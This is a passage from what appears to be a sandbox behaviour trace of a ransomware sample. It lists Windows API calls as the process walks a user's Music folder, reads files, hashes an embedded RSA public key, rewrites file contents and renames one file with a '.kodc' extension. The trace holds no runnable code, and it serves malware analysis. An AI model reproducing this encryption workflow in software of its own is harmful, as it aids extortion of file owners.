dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0099.063] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0099.064] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0099.064] GetLastError () returned 0x0 [0099.064] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0099.064] CryptReleaseContext (hProv=0x6932f0, dwFlags=0x0) returned 1 [0099.064] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.064] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0099.064] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0099.064] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.064] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0099.064] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.064] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.064] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4ef0) returned 0x9ba4d90 [0099.064] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0099.064] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.064] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0099.064] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.064] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0099.064] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0099.064] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9da80 [0099.064] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ace8 [0099.064] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9dac8 [0099.064] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ad00 [0099.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ad30 [0099.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0099.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ad48 [0099.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0099.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0099.065] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0099.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333a888 [0099.065] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ad30 | out: hHeap=0x630000) returned 1 [0099.065] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ad48 | out: hHeap=0x630000) returned 1 [0099.065] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0099.065] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0099.065] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0099.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0099.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0099.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331ad48 [0099.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0099.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331ad30 [0099.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0099.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c540 [0099.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0099.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0099.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0099.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c658 [0099.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0099.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0099.065] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0099.065] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ad48 | out: hHeap=0x630000) returned 1 [0099.065] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.065] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ad30 | out: hHeap=0x630000) returned 1 [0099.066] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0099.066] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0099.066] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0099.066] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0099.066] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0099.066] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.066] GetCurrentThreadId () returned 0x42c [0099.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0099.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9b90048 [0099.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0099.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0099.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0099.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0099.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.066] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.066] GetCurrentThreadId () returned 0x42c [0099.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.066] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0099.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.066] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0099.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0099.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0099.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0099.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0099.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0099.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0099.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0099.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0099.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0099.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0099.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ad30 [0099.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0099.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0099.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0099.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0099.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0099.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ad48 [0099.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0099.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0099.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0099.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ad18 [0099.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0099.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0099.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0099.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0099.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0099.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0099.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331ad60 [0099.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0099.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a538 [0099.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0099.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0099.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0099.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0099.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0099.069] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x4eee, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.069] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0099.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0099.069] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0099.070] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0099.070] CloseHandle (hObject=0x5cc) returned 1 [0099.071] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\gXSOfYbcO.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gxsofybco.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\gXSOfYbcO.wav.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gxsofybco.wav.kodc")) returned 1 [0099.072] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0099.072] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.072] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.073] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0099.073] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad578d80, ftCreationTime.dwHighDateTime=0x1d5bb7d, ftLastAccessTime.dwLowDateTime=0x18cfc610, ftLastAccessTime.dwHighDateTime=0x1d5bbcc, ftLastWriteTime.dwLowDateTime=0x18cfc610, ftLastWriteTime.dwHighDateTime=0x1d5bbcc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jnsPq9bVvOwQR", cAlternateFileName="JNSPQ9~1")) returned 1 [0099.073] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ffbf420, ftCreationTime.dwHighDateTime=0x1d5b6b0, ftLastAccessTime.dwLowDateTime=0xfa642b20, ftLastAccessTime.dwHighDateTime=0x1d5bf82, ftLastWriteTime.dwLowDateTime=0xfa642b20, ftLastWriteTime.dwHighDateTime=0x1d5bf82, nFileSizeHigh=0x0, nFileSizeLow=0x9aa9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lQleP8ZqnzS.mp3", cAlternateFileName="LQLEP8~1.MP3")) returned 1 [0099.073] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\lQleP8ZqnzS.mp3") returned=".mp3" [0099.073] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\lQleP8ZqnzS.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lqlep8zqnzs.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0099.073] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=39593) returned 1 [0099.074] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0099.077] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x9a83, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.077] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0099.077] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.077] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.077] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.077] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x9aa9, lpOverlapped=0x0) returned 1 [0099.078] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.078] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0099.078] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.078] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.078] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x6932f0) returned 1 [0099.079] CryptCreateHash (in: hProv=0x6932f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0099.079] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0099.079] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0099.079] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0099.079] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0099.079] GetLastError () returned 0x0 [0099.079] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0099.079] CryptReleaseContext (hProv=0x6932f0, dwFlags=0x0) returned 1 [0099.079] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.079] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0099.079] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0099.079] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.079] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0099.079] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.079] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.079] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9ab0) returned 0x9ba4d90 [0099.079] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0099.079] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0099.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0099.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0099.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9dac8 [0099.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ad00 [0099.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9db10 [0099.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ad18 [0099.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ad48 [0099.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0099.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ad60 [0099.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0099.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0099.080] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0099.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0099.080] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ad48 | out: hHeap=0x630000) returned 1 [0099.080] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ad60 | out: hHeap=0x630000) returned 1 [0099.080] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0099.080] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0099.080] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0099.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0099.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331ad60 [0099.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0099.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331ad48 [0099.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0099.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c658 [0099.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0099.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0099.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0099.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c770 [0099.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0099.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0099.080] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0099.080] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ad60 | out: hHeap=0x630000) returned 1 [0099.081] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.081] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ad48 | out: hHeap=0x630000) returned 1 [0099.081] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0099.081] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0099.081] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0099.081] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0099.081] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0099.081] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.081] GetCurrentThreadId () returned 0x42c [0099.081] RtlAllocateHeap (HeapHandle=0x630000, 